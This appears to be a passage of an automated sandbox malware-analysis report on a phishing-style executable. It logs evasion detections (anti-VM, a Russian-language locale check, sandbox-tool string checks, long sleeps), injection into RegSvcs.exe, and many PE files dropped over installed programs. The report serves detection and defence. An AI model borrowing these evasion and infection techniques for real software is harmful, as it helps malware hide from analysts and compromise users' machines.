Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7088, type: MEMORYSTR

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_007352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	7_2_007352A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 10_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	10_2_009952A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 12_2_00C052A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	12_2_00C052A0

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	API/Special instruction interceptor: Address: B4C26C
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	API/Special instruction interceptor: Address: D0DAF4
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	API/Special instruction interceptor: Address: B5370C

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Grinnellia.exe, 00000008.00000002.2099585917.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000002.2252760529.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073509147.0000000000DA1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXEZ
Source: Grinnellia.exe, 0000000B.00000002.2128861465.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXEBRBB

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 9E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 2460000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 4460000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 5820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 2D820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Memory allocated: 1490000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Memory allocated: 3110000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Memory allocated: 3010000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 3030000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 3230000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 5230000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

13_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5777
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1850
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Window / User API: threadDelayed 1324

Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
